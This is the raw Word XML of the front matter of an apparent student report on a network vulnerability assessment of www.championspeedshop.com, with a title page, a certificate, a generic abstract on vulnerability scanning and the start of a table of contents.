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54253" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="00336E0D">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1E5746" w14:textId="1AD9FC00" w:rsidR="00A778D5" w:rsidRDefault="00336E0D" w:rsidP="00336E0D">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
        </w:rPr>
        <w:t>Network Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D06EEAC" w14:textId="1663BA89" w:rsidR="00A778D5" w:rsidRDefault="00336E0D" w:rsidP="00336E0D">
      <w:pPr>
        <w:spacing w:before="313" w:line="379" w:lineRule="auto"/>
        <w:ind w:right="2558"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                For the target: www.championspeedshop.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF18F1" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="37"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6CDB4C" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:ind w:left="1683" w:right="1589"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7125D54A" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53745A30" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B4C944" w14:textId="3B05C4E7" w:rsidR="00A778D5" w:rsidRDefault="00C6408B" w:rsidP="00C6408B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="2070" w:right="2886" w:hanging="95"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Veeraboina Gnaneswar </w:t>
      </w:r>
      <w:r w:rsidR="00445FE1">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00445FE1">
        <w:t>(20B</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="00445FE1">
        <w:t>C1</w:t>
      </w:r>
      <w:r>
        <w:t>0215</w:t>
      </w:r>
      <w:r w:rsidR="00445FE1">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6BDC97" w14:textId="21A7B84B" w:rsidR="007902BA" w:rsidRDefault="00C6408B" w:rsidP="00C6408B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="2070" w:right="2886" w:hanging="95"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>V.Venu Madhav Reddy</w:t>
      </w:r>
      <w:r w:rsidR="007902BA">
        <w:t>(20BC</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="007902BA">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>158</w:t>
      </w:r>
      <w:r w:rsidR="007902BA">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7D1F48" w14:textId="0B468F6F" w:rsidR="00C6408B" w:rsidRDefault="00C6408B" w:rsidP="00C6408B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="2070" w:right="2886" w:hanging="95"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Satrasala Nikhil Kumar(20BCY10169)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CF221B" w14:textId="4BE7DC27" w:rsidR="00C6408B" w:rsidRDefault="00C6408B" w:rsidP="00C6408B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="2070" w:right="2886" w:hanging="95"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00C6408B">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6408B">
        <w:t>ativada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6408B">
        <w:t>okavardha</w:t>
      </w:r>
      <w:r>
        <w:t>n (20BCY10085)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A09C5" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5375C320" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67CB8681" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:ind w:left="1683" w:right="1602"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Submitted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F3E194" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78218EA7" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19945861" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0F4858" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44574045" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21BAB5DB" wp14:editId="12DF5E3D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2713354</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>116879</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2762871" cy="77409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762871" cy="774096"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62496AE9" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3597504D" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F063C8" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="379" w:lineRule="auto"/>
        <w:ind w:left="2375" w:right="2281"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>SCHOOL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>OF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ELECTRONICS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ENGINEERING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-67"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>VELLORE INSTITUTE OF TECHNOLOGY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>CHENNAI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>600127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09309FEA" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFEF345" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="00A778D5" w:rsidSect="00336E0D">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="100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2C7828D" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:spacing w:before="62"/>
        <w:ind w:left="1683" w:right="1596"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE7FE97" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="711EB681" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424C66ED" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081579E1" w14:textId="22048433" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:spacing w:line="379" w:lineRule="auto"/>
        <w:ind w:left="472" w:right="370"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This is to certify that the Project work titled “</w:t>
      </w:r>
      <w:r w:rsidR="007902BA">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Network Vulnerability Assessment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>” is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">being submitted by </w:t>
      </w:r>
      <w:r w:rsidR="007902BA">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Melvin R (20BLC1022) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and Mohith Kalekar (20BLC1082) for the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>course Data Communication Networks, is a record of bonafide work done under my guidance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>work,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>parts,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>neither</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>been</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>taken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>other</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>been submitted to any other Institute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>or University</w:t>
      </w:r>
      <w:r w:rsidR="007902BA">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF14FCE" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:spacing w:line="379" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00A778D5" w:rsidSect="00336E0D">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="146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68F6BF9" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:spacing w:before="64"/>
        <w:ind w:left="1683" w:right="1593"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E1D00" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1B7845" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D65600" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00C27E96">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27E96">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The network vulnerability assessment is a critical process that evaluates the security posture of computer networks, aiming to identify and address potential vulnerabilities. This assessment helps organizations proactively mitigate risks, enhance security measures, ensure compliance with regulations, and improve incident response planning. By conducting vulnerability scanning, penetration testing, and analysis of security controls, the assessment identifies vulnerabilities of varying severity. The results guide the prioritization of resources for remediation efforts. Furthermore, the assessment increases awareness among network administrators and fosters a security-conscious culture within the organization. Regular vulnerability assessments and continuous monitoring are recommended to stay vigilant against evolving threats and maintain an effective security posture. Overall, the network vulnerability assessment serves as a proactive measure to protect sensitive data, minimize the impact of security incidents, and enhance </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D7885" w14:textId="697CBEC3" w:rsidR="00C27E96" w:rsidRDefault="00C27E96">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27E96">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the overall security of the network infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF3832E" w14:textId="62E4D927" w:rsidR="00C27E96" w:rsidRDefault="00C27E96">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00C27E96"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7FC5B9F" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="59"/>
        <w:ind w:left="3687" w:right="4286"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1753A96C" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9752B9" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4D6FC7" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="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4"/>
        <w:gridCol w:w="7018"/>
        <w:gridCol w:w="62"/>
        <w:gridCol w:w="885"/>
        <w:gridCol w:w="46"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A778D5" w14:paraId="6A819F4E" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="46" w:type="dxa"/>
          <w:trHeight w:val="870"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1094" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14C606C7" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="96" w:right="88"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Chapter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BFEBFE9" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="161" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="84" w:right="88"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7080" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4715094A" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="3278" w:right="3267"/>
              <w:jc w:val="center"/>
              <w:rPr>
